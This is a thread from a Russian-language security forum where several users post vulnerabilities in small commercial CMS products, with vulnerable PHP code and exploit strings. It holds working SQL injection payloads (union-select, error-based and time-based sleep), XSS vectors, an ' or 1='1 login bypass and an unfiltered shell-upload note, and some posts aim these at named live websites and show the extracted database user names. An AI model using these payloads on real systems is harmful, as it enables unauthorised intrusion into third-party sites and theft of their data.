HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.07.2012, 16:54
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Smart-CMS

Уязвимость: SQL-Injection

http://www.site.com/program/link.php?act=list&id=[SQLi]



Уязвимость
: XSS-Active

http://www.site.com/program/register.php

Поля: "User name", "Reporter name".

http://1337day.com/exploits/19051
 
Ответить с цитированием

  #2  
Старый 06.10.2012, 18:19
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Множественные уязвимости в Budhae CMS

Нашёл - BigBear

URL разработчика - www.asuhanov.com/ourcms.php

demo - _ttp://demo.budhaecms.ru/budhae/index.php

Active XSS при добавлении/просмотре пользователя

Уязвимый код

/mods/component_user/add_user.php

Код:
Code:
if ($_POST['process']==1)
		{
				$ADDUSER['login']=$_POST['login'];
				$ADDUSER['fullname']=$_POST['fullname'];
				$ADDUSER['types']=$_POST['types'];
				
				$ADDUSER['pass']=$_POST['pass'];
				$ADDUSER['confirm']=$_POST['confirm'];				
						if ($_POST['pass']==$_POST['confirm']){
								if ($SID->NewUser($ADDUSER)==1){echo ShowMessage('Пользователь добавлен',1);}else{echo ShowMessage('Такой пользователь уже существует',0);}
								echo ShowMessage('Пароли не совпадают',0);							
						}else{
							echo ShowMessage('Пароли не совпадают',0);					
						}
		}
/mods/component_user/list_user.php

Код:
Code:
$USERS = $SID->GetListOfUser();
	$PRNUSER='';
	for ($i=0;$iПользователь: '.$USERS[$i]["budhae_login"].' ('.$USERS[$i]["budhae_fullname"].') - '.$USERS[$i]["budhae_type"].' - Редактировать Удалить
';		
		}
Вектор атаки - добавляем пользователя в админке http://site/admin/b_users.php

Login = alert(1234)

ФИО = alert(12345)




Active XSS
при редактировании карты сайта

Уязвимый код

/classes/budhae_webpage.php

Код:
Code:
function AddNewPages($INFO){
				
		include_once ("sql.php");
		$execute2 = new DBConnect;
		$execute2->Connect();
		$SQL="INSERT INTO `webpages` (`name`,`url`,`type`) VALUES ('".$INFO["name"]."','".$INFO["url"]."','".$INFO["type"]."');";
		$dump = $execute2->Query($SQL);
		$execute2->Close();
					
...
					
function GetAllPages(){
					
		include_once ("sql.php");
		$execute = new DBConnect;
		$execute->Connect();
		$SQL="SELECT * FROM `webpages`";
		$dump = $execute->Query($SQL);
		$Count=0;
		while ($row=mysql_fetch_array($dump)){
			$SID[$Count]['id']=$row['id'];
			$SID[$Count]['name']=$row['name'];
			$SID[$Count]['url']=$row['url'];
			$SID[$Count]['type']=$row['type'];
			$Count++;
  			 };
										 $execute->Close();
										 return $SID;						
					
					}
Вектор атаки

Добавляем новую страницу http://site/admin/b_weburl.php?mode=add&step=1

Название = alert(100)

URL = alert(200)


Active XSSпри добавлении фото

Уязвимый код

/classes/budhae_gallery.php

Код:
Code:
function AddGallery($name,$gid,$tn)
             {
	            include_once ("sql.php");
	            $execute2 = new DBConnect;
	            $execute2->Connect();
				$TableName='bd_'.$gid.'_galleryname';
				
                $SQL="INSERT INTO `".$TableName."` (`gnames`,`description1`) VALUES ('".$name."','".$tn."');";
                $dump = $execute2->Query($SQL);
				
				
				
	            $execute2->Close();
             }
					
...
					
function GetAllGallery()
		{
		include_once ("sql.php");
		$execute = new DBConnect;
		$execute->Connect();
		$SQL="SELECT * FROM `gallery_table`";
		$dump = $execute->Query($SQL);
		$Count=0;
		while ($row=mysql_fetch_array($dump)){
				$SID[$Count]['id']=$row['id'];
				$SID[$Count]['name']=$row['name'];
				$SID[$Count]['idgallery']=$row['idgallery'];
				$Count++;
		 };
Вектор атаки

Добавляем новую галлерею http://site/admin/b_gallery.php?gid=&method=add

Название галереи = alert(100)


SQL-Injection при просмотре "Типа Новостей"

Уязвимый код

/classes/budhae_cats.php

Код:
Code:
function GetPageNameById($id,$gid){

                 $execute = new DBConnect;
                 $execute->Connect();
				 $TableName='bd_'.$gid.'_list';
                 $SQL="SELECT * FROM `".$TableName."` WHERE  `id`=".$id." ORDER BY `show` ASC";
                 $dump = $execute->Query($SQL);
	                while ($row=mysql_fetch_array($dump)){
    	                  $datetotal = $row['name'];
        	     	 };
                 $execute->Close();
                 return $datetotal;
				 

			}
Exploit

http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +group+by+3

http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +union+select+1,@@version,3


SQL-Injection при просмотре "Фотоальбома"

Уязвимый код

/classes/budhae_cats.php

Код:
Code:
function  GetPageNameById($id,$gid){
                include_once ("sql.php");
                $execute = new DBConnect;
                $execute->Connect();
				
				$TableName='bd_'.$gid.'_galleryname';
				
				$SQL = "SELECT * FROM `".$TableName."` WHERE `id` =".$id;
                $dump = $execute->Query($SQL);
                 while ($row=mysql_fetch_array($dump)){
                $SName = $row['gnames'];
                	 };
                $execute->Close();
                return $SName;
            }
Exploit

http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +group+by+7

http://site/admin/b_catsuser.php?gid=MyCats&method=edit&id=2+and+1=1 +union+select+1,@@version,3,4,5,6,7


ByPass Authentication



Уязвимый код


/classes/budhae_user.php

Код:
Code:
function UserLogin($USERID){		
				 $USERID['login']=strtolower($USERID['login']);
			     include_once ("sql.php");
                 $execute = new DBConnect;
                 $execute->Connect();
				 $SQL="SELECT * FROM users WHERE `login`='".$USERID['login']."' AND `password` ='".$USERID['password']."' LIMIT 1;";
                 $dump = $execute->Query($SQL);
                 $row=mysql_fetch_array($dump);			 
                                   @session_start();								   
				   $_SESSION['budhae_login']=$row['login'];
				   $_SESSION['budhae_password']=$row['password'];
				   $_SESSION['budhae_type']=$row['type'];
				   $_SESSION['budhae_fullname']=$row['fullname'];
				   $_SESSION['budhae_date']=$row['date'];							     
				   $_SESSION['budhae_status']='approved';
				   $_SESSION['unique']=$row['unique'];;
                                   return session_id();    			 		
				$execute->Close();	
		}
Exploit

http://site/admin/index.php

login= 1' or 1='1

pass = 1' or 1='1


Раскрытие путей при любом обращении к файлам в /mods

_ttp://site/admin/mods/component_ftp/companent_main.php

_ttp://site/admin/mods/component_detect_cats.php


Код:
Code:
Fatal error: Class 'Files' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_ftp/companent_main.php on line 3
Код:
Code:
Fatal error: Class 'Components' not found in /var/www/clients/client11/web106/web/demo/budhae/mods/component_detect_cats.php on line 7
Заливка шелла

_ttp://site/admin/filecomponent.php

Загружаемые расширения не фильтруются ---> shell.php

P.S. Очень дырявый и бажный движок. Перед покупкой 100 раз подумайте !!!

PoC: http://ioanidi.com/admins/
 
Ответить с цитированием

  #3  
Старый 14.12.2012, 18:30
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

CMS alfasfera.com

Уязвимости к CMS этой веб-студии.

SQL Injection (POST method)

Идем на страницу восстановления пароля:

Код:
Code:
/page/new_pass/
Вставляем в поле E-Mail SQL запрос.



Панель админ-авторизации: /admin


Примеры уязвимых сайтов:

Уязвимые сайты найти можно у них в портфолио, вот два примера.

_ttp://imprus.su - Онлайн игра

_ttp://antipedofil.org - Оккупай-Педофиляй ит.д.


Хэширование пароля

Пароль хэшируется в MD5 с добавлением соли.

Код:
Code:
497911ed40a7e76681c5e93113f9e4a1:tt-
Этот хэш присутствует на всех сайтах, так что это тоже можно считать уязвимостью.

Найдено мною
 
Ответить с цитированием

  #4  
Старый 09.01.2013, 06:59
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Связка эксплойтовCritXpack

Активная XSS в поле BackURL

Для её работы нужно создать поток с .exe потом указать BackURL пример google.com/alert('a')

Внимание, после указание BackURL у вас исчезнет статистика, браузеров, загрузок, уников, лоадов и прочее. Зато после проверки админом придёт его сессия.
 
Ответить с цитированием

  #5  
Старый 10.05.2013, 21:36
rogatiy
Guest
Сообщений: n/a
Провел на форуме:
11733

Репутация: 0
По умолчанию

Узнать версию Amiro.CMS

Разработчик CMS: Amiro

Номер версии:
[/CODE]
Значение переменной '_cv' - версия CMS. Так для 5.14.6 _cv=5.14.6.6, а для 5.8.4 _cv=5.8.4.0. Кроме того, попробуйте воспользоваться поиском по коду, ибо данная переменная много, где фигурирует.

PS: Выложите на exploit-db по возможности, может пригодится в будущем.
 
Ответить с цитированием

  #6  
Старый 03.03.2014, 00:04
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

SiteLeader CMS

Цена: Стоимость услуг по разработке сайтов: 75 000 — 250 000

Сайт: www.siteleader.ru

Тестировалось на версии 3.62


SQL Injection

Код:
Code:
/news/[VALIDNUMBER][SQLINJ]


Пример реализации

Код:
Code:
http://www.juliavolkova.com/ru/news/1'




Код:
Code:
http://www.juliavolkova.com/ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a


Ответ: VOLKOVA@LOCALHOST:VOLKOVA



Код:
Code:
http://krasimvse.ru/news/1'




Код:
Code:
http://krasimvse.ru/news/-1' union all select 1,2,concat(user(),0x3a,database()),4,5-- a


Ответ: kraskoteka@localhost:kraskoteka

Админ-панель: /admin/login/

Стандартный логин: root


При добавлении контента (в админ-панели) везде выполняется JS код.

Найдено мной
 
Ответить с цитированием

  #7  
Старый 03.04.2014, 11:57
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

CMS A4-site

Сайт:www.a4-site.ru

Демо-версия:www.demo.a4-site.ru

Функциональность: От сайтов-визиток с минимальной функциональностью до проектов с посещаемостью в десятки и сотни тысяч посетителей в день. (c)

Стоимость:Система управления сайтом A4-Site пока не продается "в коробке". Но вы можете заказать реализацию вашего проекта на ее основе в Интернет-компании A4-Site.(c)

Исследования проводим на демо-версии.

SQL Injection

Уязвимый параметр: search_str

Вектор: error-based

Требования: mq = off

Exploit:[http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search& search_str='and(extractvalue(1,concat(0x3a,version())))and'&search_cond=AND]

Query:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]INSERT INTO distr_searchlog[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sl_query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_count[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_time[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sl_cond[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]and([/COLOR][COLOR="#0000BB"]extractvalue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"]())))and[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'AND'[/COLOR][COLOR="#007700"])[/COLOR][/COLOR
XSS (passive)

Все тот же параметр search_str

Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search& search_str=">&search_cond=AND]
 
Ответить с цитированием

  #8  
Старый 23.07.2014, 11:59
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

CMS Business Station

Сайт:http://cms-bs.ru

Стоимость:http://cms-bs.ru/configuration/

reflected XSS

Уязвимость присутствует в форме авторизации - переменная login.

PoC: отправляем пакет

Цитата:
Сообщение от None  
POST /configuration/ HTTP/1.1
Host: cms-bs.ru
...
login=
">alert(1)
&password=111&submit=%C2%F5%EE%E4
 
Ответить с цитированием

  #9  
Старый 09.03.2015, 12:43
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

CMS Shop-Rent

Сайт: shop-rent.ru

Time-Based Blind SQL Injection (pics.php):

Код:
Code:
pics.php?id=1'+and+(select * from+(select(sleep(10)))x)+and--'1
XSS

Код:
Code:
pics.php?id=">alert();
Примеры:

Код:
Code:
http://disloc.ru/pics.php?id=1' and (select * from (select(sleep(10)))x) and--'1
TRUE

Код:
Code:
http://bookcoffee.ru/pics.php?id=215' and (select * from (select(sleep(10)))x) and--'1
TRUE

Таблица с администраторами: gd_main_users

Таблица с остальными пользователями: gd_users

Админ-панель: admin.site.ru
 
Ответить с цитированием

  #10  
Старый 22.05.2017, 12:27
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

http://www.vi-site.me/

site.ru/admin

LOGIN: admin' or 1='1

PASS: null
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07
Обзор рынка взломщиков электронной почты, март2004 Игорь Белкин Уязвимости Mail-сервис 5 25.03.2004 12:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ